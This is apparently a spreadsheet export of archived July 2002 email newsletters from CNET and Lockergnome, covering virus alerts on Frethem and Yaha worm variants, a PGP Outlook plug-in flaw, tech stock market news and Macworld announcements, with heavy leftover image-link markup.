    <t>http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://i.i.com.com http://www.techrepublic.com http://a.r.tv.com http://cnet.com http://a.r.tv.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://home.cnet.com http://electronics.cnet.com http://home.cnet.com http://www.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cnet-newsletters@example.com\nFrom: CNET Virus  Security Newsletter &lt;Online#3.20345.8a-FdJElUl0a335ndRR.1@newsletter.online.com&gt;\nDate: Wed, 17 Jul 2002 16:30:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 16:30:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Virus  Security Newsletter &lt;Online#3.20345.8a-FdJElUl0a335ndRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>CNET: Copycat worms and a PGP Outlook flaw</t>
  </si>
  <si>
    <t>![CNET Virus &amp; Security\nNewsletter]([URL]http://a.r.tv.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n  \n---  \n  \n  \n  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] 17, 2002  \n![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://a.r.tv.com[/URL]  \n\--Robert Vamosi  \nSenior Associate Editor  \nCNET Software and Internet Services |   |  **Dear Readers,**  \nSo far, 2002 has been a year marked with variations on earlier worms. If you\nupdate your antivirus software on a regular basis, these new versions of\nFrethem and Yaha shouldn't be a nuisance. But if you haven't updated in a\nwhile, these variants--plus the continuing threat of Klez.h--should motivate\nyou. In security news, a flaw in certain versions of PGP encryption could\naffect Outlook users. Read on to learn whether you're vulnerable.  \n  \n  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n---  \n![Alerts]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n**Frethem.k worm wants to give you a password**  \nAn e-mail message that promises to reveal secret information with a password\nis yet another variant from the pesky Frethem worm family. Frethem.k,\ntechnically known as w32.frethem.k@mm, also called Frethem.l by some vendors,\nuses its own SMTP engine to send e-mail using addresses obtained from infected\nsystems. This worm does not carry a destructive payload. Mac and Linux users\nare not affected.\n\n**Yaha.e screensaver worm spreading**  \nThe Yaha.e mass-mailing worm masquerades as a friendly screensaver, proving\nthat users worldwide are still opening attached files from total strangers.\nYaha.e (w32.yaha.e@mm, also known as Lentin.e, Yaha.f, and Yaha.g) is a\nsuccessful variant of a worm first seen around Valentine's Day this year.\nThankfully, this worm does not affect Mac, Linux, or Unix users.\n\n![News]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n**Leaky PGP Outlook plug-in**  \nPGP 7.03 and 7.04, widely used plug-ins for Microsoft's Outlook e-mail client,\ninadvertently weakens security and leaves the mail program open to attack.\nFortunately, there is a patch available.\n\n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![Crucial Clicks]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://a.r.tv.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | **Digital photography starter kit**  \nThis guide to digital photos will show you the best products to take your\nimages from snap to finish.  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \nÂ• Panasonic's littlest Lumix  \nÂ• Minolta"s 4-megapixel Dimage F100  \n  \n![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n**Most popular products**  \n![]([URL]http://home.cnet.com[/URL]  \n**Digital cameras**  \n![]([URL]http://home.cnet.com[/URL]  \n1\. Canon PowerShot G2  \n![]([URL]http://home.cnet.com[/URL]  \n2\. Canon PowerShot S30  \n![]([URL]http://home.cnet.com[/URL]  \n3\. Canon PowerShot S40  \n![]([URL]http://home.cnet.com[/URL]  \n4\. Canon PowerShot A40  \n![]([URL]http://home.cnet.com[/URL]  \n5\. Sony Cyber Shot DSC-F707  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL] **See all most popular\ncameras**  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n|   | **Search**   |  |  In SoftwareAll CNET    The Web |  \n---|---|---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]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61&amp;ISSUE=2002-07-17)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://home.cnet.com http://www.cnet.com http://www.cnet.com http://home.cnet.com http://home.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zdnet@example.com\nFrom: "CNET News.com Investor" &lt;Online#3.20340.74-k8cCgc95N6xNP9RR.1@newsletter.online.com&gt;\nDate: Wed, 17 Jul 2002 14:20:14 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 14:20:14 -0700 (PDT)</t>
  </si>
  <si>
    <t>"CNET News.com Investor" &lt;Online#3.20340.74-k8cCgc95N6xNP9RR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>NEWS.COM INVESTOR: Techs gain on Intel, Motorola news</t>
  </si>
  <si>
    <t>\n\n![CNET Investor Dispatch]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n  \n|  |  **Quote Lookup**  \nEnter symbol:  \n  \n* Symbol Lookup  \nQuotes delayed 20+ minutes  \n---  \n  \n![Investor Sections]([URL]http://www.cnet.com[/URL]  \nÂ• **My Portfolio**  \nÂ• **Broker Reports**  \nÂ• **IPOs**  \nÂ• **Splits**  \nÂ• **Messages**\n\n![Tech Winners]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  | TLTOA | 23.0 |\n35.29%  \n---|---|---|---  \n![]([URL]http://home.cnet.com[/URL]  | INFS | 12.7 | 23.42%  \n![]([URL]http://home.cnet.com[/URL]  | JACO | 4.9 | 22.19%  \n![]([URL]http://home.cnet.com[/URL]  | TSCM | 2.92 | 22.18%  \n![]([URL]http://home.cnet.com[/URL]  | XOSY | 5.5 | 20.88%  \n  \n![Tech Losers]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  | AUGT | 5.239 |\n-36.88%  \n---|---|---|---  \n![]([URL]http://home.cnet.com[/URL]  | BUCA | 9.26 |\n-30.64%  \n![]([URL]http://home.cnet.com[/URL]  | SPIR | 1.9 |\n-29.60%  \n![]([URL]http://home.cnet.com[/URL]  | RSTO | 4.95 |\n-23.26%  \n![]([URL]http://home.cnet.com[/URL]  | NOVN | 11.935 |\n-22.10%  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \nJuly 17, 2002  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] DJIA  \n8542.48  69.37 | ![]([URL]http://home.cnet.com[/URL] NASDAQ  \n1397.25  21.99 | ![]([URL]http://home.cnet.com[/URL] S&amp;P;\n500  \n906.04  5.10 | ![]([URL]http://home.cnet.com[/URL] CNET\nTECH  \n1,007.43  14.52  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n**Techs gain on Intel, Motorola news**  \nAlthough computer chip titan Intel posted lower-than-expected earnings, its\nupbeat forecast helped lift technology shares Wednesday.\n\nAlso boosting the sector was Motorola, which beat expectations for operating\nearnings and predicted a net profit in the last two quarters of the year.\nCNET's Tech index rose 14.46 points, or 1.41 percent, to 1,007.37, and the\ntech-laced Nasdaq composite index tacked on 21.97 points, or 1.6 percent, to\n1,397.23.\n\nWith aircraft maker Boeing beating the consensus Wall Street earnings\nestimate, the Dow Jones industrials increased 69.37 points, or 0.82 percent,\nto 8,542.48. The S&amp;P; 500 rose 5.08 points, or 0.56 percent, to 906.02.  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![Top Investor News]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**Motorola Sees Profit Rebound**  \nCHICAGO - Wireless technology giant Motorola Inc. on Wednesday said it expects\nto bounce back to a net profit in the third and fourth quarters helped by\naggressive cost cutting. Motorola, a day after posting the largest quarterly\nloss in its history, said it expects to achieve earnings of about 2 cents a\nshare in the third quarter and 10 cents in the fourth quarter. The estimated\nearnings for the second half of the year includes charges of about $215\nmillion related to previously announced restructuring actions. The world's\nsecond largest mobile phone maker has slashed its work force by more than a\nthird from its peak of 150,000 in August 2000. It said last month it would cut\nanother 7,000 jobs, bringing employment to 93,000 by mid-2003.  \n**MOTOROLA, INC 15.15 4.27%**\n\n**Apple meets lowered expectations**  \nApple Computer on Tuesday reported quarterly sales and earnings that matched\nanalysts' lowered expectations as flat-panel iMac sales and sales to schools\nfell short of the company's initial hopes. The company earned $32 million, or\n9 cents per share, on revenue of $1.43 billion. In the same quarter a year\nago, Apple earned $61 million, or 17 cents per share, on revenue of $1.48\nbillion Analysts expected Apple to report earnings of 9 cents per share,\naccording to First Call. Apple warned last month that sales would be in the\nrange of $1.4 billion to $1.45 billion, down from an earlier estimate of $1.6\nbillion. The company said it expected earnings to be between 8 and 10 cents\nper share.  \n**APPLE COMPUTER INC 15.63 -12.49%**\n\n**HP, EMC storage systems to work better together**  \nSAN FRANCISCO - Hewlett-Packard Co. and EMC Corp. said on Wednesday that they\nwere opening up technology to each other in order to maker their storage\nsystems work better together. However, the deal will not include technology\nfrom Hitachi Data Systems, which makes the hardware for HP's high-end storage\nsystem, an HP spokesman said. The deal follows close cooperation between\nstorage heavyweight EMC and Compaq Computer Corp., which was acquired by HP in\nMay.  \n**HEWLETT-PACKARD CO 13.57 -4.84%**\n\n**Also from CNET**  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \nReal-time stock quotes from CNET News.com Investor.  \n30-day free trial!\n\n![Today's Broker Reports]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**Investec Inc. stays bullish on Intel in report 7/17/02**  \nAnalysts Eric Ross and Sam Chang reiterate a "strong buy" rating on the\ncomputer chip giant after it reports second-quarter earnings below the\nconsensus Wall Street estimate. Ross and Chang expect a modest seasonal\nincrease in demand in the second half of this year, with strength in consumer\nlaptop buying. Calling Intel the premier semiconductor firm, they suggest the\nstock is a bargain.  \n**INTEL CORP 19.44 5.88%**  \nVisit the Brokerage Center\n\n![CEO Wealth Meter]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**AT&amp;T; names Dorman chairman, succeeding Armstrong **  \nNEW YORK - AT&amp;T; Corp. said on Wednesday its president, David Dorman, will\nsucceed C. Michael Armstrong as chairman and chief executive officer when the\nnation's largest telephone company sells its cable-television business to\nComcast Corp. Dorman's appointment, which was widely expected, will become\neffective once the sale of AT&amp;T; Broadband closes later this year.  \n**AT &amp;T; CORP 10.45 2.55% **  \nVisit the CEO Wealth Meter  \n\n  \n  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![Crucial Clicks]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://a.r.tv.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | **Digital photography starter kit**  \nThis guide to digital photos will show you the best products to take your\nimages from snap to finish.  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \nÂ• Panasonic's littlest Lumix  \nÂ• Minolta"s 4-megapixel Dimage F100  \n  \n![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n**Most popular products**  \n![]([URL]http://home.cnet.com[/URL]  \n**Digital cameras**  \n![]([URL]http://home.cnet.com[/URL]  \n1\. Canon PowerShot G2  \n![]([URL]http://home.cnet.com[/URL]  \n2\. Canon PowerShot S30  \n![]([URL]http://home.cnet.com[/URL]  \n3\. Canon PowerShot S40  \n![]([URL]http://home.cnet.com[/URL]  \n4\. Canon PowerShot A40  \n![]([URL]http://home.cnet.com[/URL]  \n5\. Sony Cyber Shot DSC-F707  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL] **See all most popular\ncameras**  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n| **NEW!** CNET professional e-mail publishing for just $24.95/month. **FREE\nfor 30 days. Click here!**  \n---  \n  \n![Sign up for more free newsletters from\nCNET!]([URL]http://a.r.tv.com[/URL]  \nThe e-mail address for your subscription is qqqqqqqqqq-zdnet@example.com\n\nUnsubscribe | Manage My Subscriptions | FAQ | Advertise\n\nPlease send any questions, comments, or concerns to dispatchfeedback@news.com.  \n![]([URL]http://www.zdnet.com[/URL] ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]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26&amp;ISSUE=2002-07-17)  \n  \n---|---  \n.  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.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cnet-newsletters@example.com\nFrom: "CNET News.com Daily Dispatch" &lt;Online#3.20330.69-7vDNg2aDG5Ru_9RR.1@newsletter.online.com&gt;\nDate: Wed, 17 Jul 2002 13:14:40 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 13:14:40 -0700 (PDT)</t>
  </si>
  <si>
    <t>"CNET News.com Daily Dispatch" &lt;Online#3.20330.69-7vDNg2aDG5Ru_9RR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>CNET NEWS.COM: Jobs touts OS X, iPods, iMac</t>
  </si>
  <si>
    <t>![]([URL]http://home.cnet.com[/URL]  \n|  \n  \n![]([URL]http://i.i.com.com[/URL]\n![]([URL]http://ad.doubleclick.net[/URL];sz=160x600;ord=\[timestamp\]?)\n\n|  ![](/b.gif)  \n  **Search**  \n  \n  News.com All CNET     The Web  \n---  \n  \n![Also from\nCNET]([URL]http://home.cnet.com[/URL]  \n**Live tech help NOW!\n\nApril's tech award\n\n1 million open jobs\n\nNews.com: Top CIOs\n\nZDNet: PeopleSoft **  \n---  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n|  | ![In the News]([URL]http://home.cnet.com[/URL]  \n| July 17, 2002  \n  \n---|---  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] Jobs touts OS X, iPods, iMac  \n![]([URL]http://home.cnet.com[/URL] Scient files for Chapter 11  \n![]([URL]http://home.cnet.com[/URL] Yahoo Mail puts words in your\nmouth  \n![]([URL]http://home.cnet.com[/URL] Unisys splits Intel server line  \n![]([URL]http://home.cnet.com[/URL] Microsoft sweetens Mac Office\noffer  \n![]([URL]http://home.cnet.com[/URL] New chip may portend ATI comeback  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n|  | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |   **Perspectives**  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n  \n**Why free downloads help, not hurt**  \nRecording artist Janis Ian argues that file swapping could actually help the\nindustry, and its musicians.  \n**Read Full Story**  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n---  \n**Jobs touts OS X, iPods, iMac**  \nNEW YORK--Apple Computer CEO Steve Jobs on Wednesday defended the company's\nswitch to the Mac OS X operating system and unveiled new iPod digital-audio\nplayers and a new flat-panel iMac. Jobs used his keynote speech at the\nMacworld trade show here to make a flurry of other announcements as well, such\nas details about new syncing software, the next update to OS X and the end of\nfree iTools. The most dramatic announcement focused on iPod. The new players\ninclude ones built specifically for computers that use Microsoft's Windows\noperating system.  \nJuly 17, 2002, 8:30 AM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Scient files for Chapter 11**  \nInternet consulting firm Scient has filed for Chapter 11 bankruptcy and agreed\nto sell certain assets to a professional services firm. The deal calls for\nSalt Lake City-based SBI to hire some of Scient's employees and to provide up\nto $4.9 million in financing, pending completion of the asset acquisition.\nScient has been struggling for some time now. Once a dot-com darling, the\ncompany recently approved a 1-for-20 reverse stock split. The company and SBI\nsaid they expect the bankruptcy court to approve the deal, adding that\nfinancing "will allow Scient to continue to deliver services to its clients\nwithout interruption until court approval of SBI's acquisition is received."  \nJuly 17, 2002, 8:30 AM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Yahoo Mail puts words in your mouth**  \nWhat does Yahoo Mail have against mocha? That's what users of the company's\nfree e-mail service may be wondering if they try to send a message using the\nword "mocha" and discover that while in transit, "mocha" mysteriously changes\nto "espresso." To protect users from malicious code, Yahoo uses an automated\nfilter to swap out a handful of words such as "mocha" that pertain to Web code\nknown as JavaScript. The reason is that e-mail sent in a form known as "Web\nenhanced" can contain JavaScript instructions that can run programs on the\nrecipient's PC. JavaScript is a Web language that can issue commands such as\ntelling the browser to open up other windows or to prompt a service to change\na password, for example.  \nJuly 17, 2002, 4:00 AM PT |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n  \n**Unisys splits Intel server line**  \nUnisys, a specialist in high-end servers, is coming out with a new lower-cost\nline of Intel-based servers as it gears up to promote the Itanium 2 chip.\nUnisys' new Aries servers accommodate as many as 16 Itanium 2 or Xeon\nprocessors and cost between $75,000 and $300,000, said Mark Fevertson, Unisys'\nvice president of server marketing. It joins the Orion line, which can use up\nto 32 Xeon or Itanium 2 processors and has been on sale for about two years at\na cost between $140,000 and $700,000.  \nJuly 17, 2002, 10:40 AM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Microsoft sweetens Mac Office offer**  \nWith sales of its Office suite for Mac OS X falling short of projections,\nMicrosoft plans on Wednesday to announce a rebate for those who buy the\nsoftware bundle when they pick up a new Mac. The promotion, which runs through\nSept. 30, entails a $50 mail-in rebate for people buying a new Mac and\nupgrading to Office v. X, and $100 for those buying a Mac and the full version\nof the software. Microsoft is also offering two new pieces of downloadable\nsoftware: one that lets Palm handhelds synchronize directly with Office v. X\nand another that lets the Macintosh view programs running on a Windows PC or\nserver.  \nJuly 17, 2002, 3:00 AM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**New chip may portend ATI comeback**  \nATI, once the leader in graphics chips, will launch its comeback bid this week\nwith a new chip that experts say could put the company back in front in terms\nof performance. The Markham, Ontario-based company on Thursday will unveil the\ndetails of the Radeon 9700, a desktop graphics chip based on a new\narchitecture that will provide greater realism when it comes to 3D images,\naccording to sources. The fastest versions of the new chips will offer\nconsiderably higher performance than Nvidia's current GeForce4 roster, giving\nATI the edge with gamers as well as PC makers, analysts said. And even after\nNvidia--which began to chip away at ATI's leading spot in graphics in 1999--\ncomes out with its GeForce 5 in a few months, the competition between the two\nwill remain close.  \nJuly 17, 2002, 4:00 AM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n|  **From our partners:**  \n---  \n![]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL]  \n**Truth is in the iMac of the beholder**  \nBusiness Week  \nIt's silly of Apple to try to squelch Internet rumors about its next moves.\nJobs &amp; Co. should rejoice that fans care enough to gossip.  \nJuly 17, 2002  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**eBags carries it off**  \nBusiness Week  \nThe dot-com boom's big spenders couldn't buy success, but this online luggage\nvendor survived by making frugality its watchword.  \nJuly 17, 2002  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Also from CNET:**  \n---  \n![]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL]  \nReal-time stock quotes from CNET News.com Investor.  \n30-day free trial!  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |  ![Crucial\n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n  \n![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n  \n---|---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://news.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n|  **Jobs presents iMac's new face**  \nIn his Macworld 2002 keynote, Apple CEO Steve Jobs shows off a new 17-inch\nflat-panel iMac.  \n![]([URL]http://news.cnet.com[/URL] **Watch Video**  \n  \n---|---|---  \n  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] |  \n| ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n  \n**Enterprise**  \n\n  * CA replaces four board members \n  * HP ousts workers for e-mail abuse\n  * Group offers computer security standard \n|\n\n**E-Business**  \n\n  * VC-backed companies fusing forces \n  * Markets edge up on Intel news\n  * uBid to charge listing fees to sellers \n  \n---|---  \n  \n**Communications**  \n\n  * Tellabs warns of "murky" sales future \n  * Banks seek freeze on WorldCom funds \n  * Motorola's net loss worst ever \n|\n\n**Media**  \n\n  * Net watchdog blasts China Web rules \n  * Yahoo strikes listing deal with CityFeet \n  * Eleven vie for .org name \n  \n  \n**Personal Technology**  \n\n  * Apple to charge for iTools services \n  * Apple meets lowered expectations \n  * Moxi moves into cable boxes  \n|  \n  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]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n\nThe e-mail address for your subscription is qqqqqqqqqq-cnet-\nnewsletters@example.com  \nUnsubscribe | Manage My Subscriptions | FAQ | Advertise\n\nPlease send any questions, comments, or concerns to dispatchfeedback@news.com.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33&amp;ISSUE=2002-07-17)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://home.cnet.com http://i.i.com.com http://ad.doubleclick.net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a.r.tv.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.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news.cnet.com http://home.cnet.com http://news.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.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lg@example.com\nFrom: Lockergnome Tech Specialist &lt;subscriptions@lockergnome.com&gt;\nDate: Wed, 17 Jul 2002 11:04:10 -0500</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 11:04:10 -0500</t>
  </si>
  <si>
    <t>Lockergnome Tech Specialist &lt;subscriptions@lockergnome.com&gt;</t>
  </si>
  <si>
    <t>[Lockergnome Tech Specialist]  Bridge Concept</t>
  </si>
  <si>
